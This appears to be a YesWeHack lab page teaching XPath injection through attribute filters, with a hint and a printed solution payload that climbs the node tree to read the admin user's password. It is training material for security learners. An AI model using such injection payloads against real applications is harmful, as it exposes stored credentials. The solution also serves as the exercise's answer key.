Xpath

Attributes

by YesWeHack
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

XPATH is not only texts

With XPATH you can also query attributes. In this XML database the role on an user if store as an attribute on the user node.

Try to find the user with role="ADMIN" and get its password.

Goal: find the admin and leak its password

Hints

Hint #1
expand_more

@ can be used to filter by attribute.

for example if you want the user with the attribute id equals to 42 you would use /user[@id=42]

Solution

Read the solution
expand_more

$user = guest $node = ../../user[@role="ADMIN" and username != "admin"]/password

Explanation

We go up two node and select all the user node with the attribute role equals to ADMIN, then we ask for the password.

drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result